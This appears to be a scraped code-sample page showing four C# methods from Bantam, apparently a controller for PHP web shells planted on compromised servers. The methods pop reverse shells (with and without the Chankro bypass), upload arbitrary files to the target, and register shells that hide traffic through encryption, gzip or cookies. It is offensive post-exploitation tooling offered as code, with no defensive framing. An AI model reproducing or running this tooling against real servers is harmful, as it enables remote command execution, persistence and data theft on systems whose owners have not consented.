Exemplo n.º 1
0
        /// <summary>
        /// Task wrapper for popping reverse shell without chankro
        /// </summary>
        /// <param name="shellCode"></param>
        private async Task PopReverseShell(string shellCode)
        {
            string phpCode = PhpBuilder.ExecuteSystemCode(shellCode, false);
            await Task.Run(() => WebRequestHelper.ExecuteRemotePHP(ShellUrl, phpCode, true).ConfigureAwait(false));

            if (checkBoxLogShellCode.Checked)
            {
                LogHelper.AddShellLog(ShellUrl, "Attempted to pop chankro reverse shell with [ " + shellCode + " ] ", LogHelper.LOG_LEVEL.REQUESTED);
            }
        }
Exemplo n.º 2
0
        /// <summary>
        /// Main upload routine
        /// </summary>
        /// <param name="sender"></param>
        /// <param name="e"></param>
        private async void btnUpload_Click(object sender, EventArgs e)
        {
            string phpCode = string.Empty;

            btnBrowse.Enabled    = false;
            btnUpload.Enabled    = false;
            richTextBox1.Enabled = false;

            if (EditingSelf)
            {
                if (!string.IsNullOrEmpty(richTextBox1.Text))
                {
                    phpCode = Helper.EncodeBase64ToString(richTextBox1.Text);
                }
                else
                {
                    LogHelper.AddShellLog(ShellUrl, "Attempted to upload empty file/data to self...", LogHelper.LOG_LEVEL.INFO);
                    btnUpload.Enabled = true;
                    return;
                }

                phpCode = PhpBuilder.WriteFileVar(PhpBuilder.phpServerScriptFileName, phpCode);
            }
            else
            {
                if (!string.IsNullOrEmpty(LocalFileLocation))
                {
                    phpCode = Convert.ToBase64String(File.ReadAllBytes(LocalFileLocation));
                }
                else if (!string.IsNullOrEmpty(richTextBox1.Text))
                {
                    phpCode = Helper.EncodeBase64ToString(richTextBox1.Text);
                }
                else
                {
                    LogHelper.AddShellLog(ShellUrl, "Attempted to upload empty file/data...", LogHelper.LOG_LEVEL.INFO);
                    btnUpload.Enabled = true;
                    return;
                }

                string remoteFileLocation = ServerPath + "/" + txtBoxFileName.Text;
                phpCode = PhpBuilder.WriteFile(remoteFileLocation, phpCode);
            }

            await WebRequestHelper.ExecuteRemotePHP(ShellUrl, phpCode);

            btnUpload.Enabled    = true;
            btnBrowse.Enabled    = true;
            richTextBox1.Enabled = true;

            this.Close();
        }
Exemplo n.º 3
0
 /// <summary>
 /// Task wrapper for spawning a chankro shell
 /// </summary>
 /// <param name="phpCode"></param>
 private async Task PopChankroShell(string phpCode)
 {
     await Task.Run(() => WebRequestHelper.ExecuteRemotePHP(ShellUrl, phpCode, true).ConfigureAwait(false));
 }
Exemplo n.º 4
0
        /// <summary>
        /// Main add shell/host To GUI routine
        /// </summary>
        /// <param name="sender"></param>
        /// <param name="e"></param>
        private async void btnAddShell_Click(object sender, EventArgs e)
        {
            string shellURL = txtBoxShellUrl.Text;

            if (string.IsNullOrEmpty(shellURL))
            {
                return;
            }

            if (checkBoxEncryptRequest.Checked)
            {
                string encryptionKey = textBoxEncrpytionKey.Text;

                if (encryptionKey.Length != 32)
                {
                    labelDynAddHostsStatus.Text = "Encryption key length must be 32 chars... Try again.";
                    return;
                }

                if (!checkBoxSendIVInRequest.Checked)
                {
                    string encryptionIV = textBoxEncrpytionIV.Text;

                    if (string.IsNullOrEmpty(encryptionIV) || encryptionIV.Length != 16)
                    {
                        labelDynAddHostsStatus.Text = "Encryption IV length must be 16 chars... Try again.";
                        return;
                    }
                }
            }

            //Remove Shell
            if (BantamMain.Shells.ContainsKey(shellURL))
            {
                BantamMain.Instance.GuiCallbackRemoveShellURL(shellURL);

                if (!BantamMain.Shells.TryRemove(shellURL, out ShellInfo shellInfoOut))
                {
                    LogHelper.AddGlobalLog("Unable to remove (" + shellURL + ") from shells", "AddShell failure", LogHelper.LOG_LEVEL.ERROR);
                    return;
                }
            }

            //Add Shell
            if (!BantamMain.Shells.TryAdd(shellURL, new ShellInfo()))
            {
                LogHelper.AddGlobalLog("Unable to add (" + shellURL + ") to shells", "AddShell failure", LogHelper.LOG_LEVEL.ERROR);
                return;
            }

            BantamMain.Shells[shellURL].RequestArgName = txtBoxArgName.Text;

            if (comboBoxVarType.Text == "cookie")
            {
                BantamMain.Shells[shellURL].SendDataViaCookie = true;
            }

            if (checkBoxResponseEncryption.Checked == false)
            {
                BantamMain.Shells[shellURL].ResponseEncryption = false;
            }
            else
            {
                BantamMain.Shells[shellURL].ResponseEncryption     = true;
                BantamMain.Shells[shellURL].ResponseEncryptionMode = comboBoxEncryptionMode.SelectedIndex;
            }

            if (checkBoxGZipRequest.Checked)
            {
                BantamMain.Shells[shellURL].GzipRequestData = true;
            }
            else
            {
                BantamMain.Shells[shellURL].GzipRequestData = false;
            }

            bool encryptResponse        = BantamMain.Shells[shellURL].ResponseEncryption;
            int  ResponseEncryptionMode = BantamMain.Shells[shellURL].ResponseEncryptionMode;

            if (checkBoxEncryptRequest.Checked)
            {
                BantamMain.Shells[shellURL].RequestEncryption    = true;
                BantamMain.Shells[shellURL].RequestEncryptionKey = textBoxEncrpytionKey.Text;

                if (checkBoxSendIVInRequest.Checked)
                {
                    BantamMain.Shells[shellURL].SendRequestEncryptionIV           = true;
                    BantamMain.Shells[shellURL].RequestEncryptionIV               = string.Empty;
                    BantamMain.Shells[shellURL].RequestEncryptionIVRequestVarName = textBoxIVVarName.Text;
                }
                else
                {
                    BantamMain.Shells[shellURL].RequestEncryptionIV = textBoxEncrpytionIV.Text;
                    BantamMain.Shells[shellURL].RequestEncryptionIVRequestVarName = string.Empty;
                }
            }
            else
            {
                BantamMain.Shells[shellURL].RequestEncryption = false;
                BantamMain.Shells[shellURL].RequestEncryptionIVRequestVarName = string.Empty;
                BantamMain.Shells[shellURL].RequestEncryptionIV  = string.Empty;
                BantamMain.Shells[shellURL].RequestEncryptionKey = string.Empty;
            }

            string         phpCode  = PhpBuilder.PhpTestExecutionWithEcho1(encryptResponse);
            ResponseObject response = await WebRequestHelper.ExecuteRemotePHP(shellURL, phpCode);

            if (string.IsNullOrEmpty(response.Result))
            {
                labelDynAddHostsStatus.Text = "Unable to connect, check your settings and try again.";
                BantamMain.Shells.TryRemove(shellURL, out ShellInfo shellInfoOut);
                return;
            }

            string result = response.Result;

            if (encryptResponse)
            {
                result = CryptoHelper.DecryptShellResponse(response.Result, response.EncryptionKey, response.EncryptionIV, ResponseEncryptionMode);
            }

            if (string.IsNullOrEmpty(result) || result != "1")
            {
                labelDynAddHostsStatus.Text = "Unable to connect, check your settings and try again.";
                BantamMain.Shells.TryRemove(shellURL, out ShellInfo shellInfoOut);
                return;
            }

            BantamMain.Instance.InitializeShellData(shellURL);

            this.Close();
        }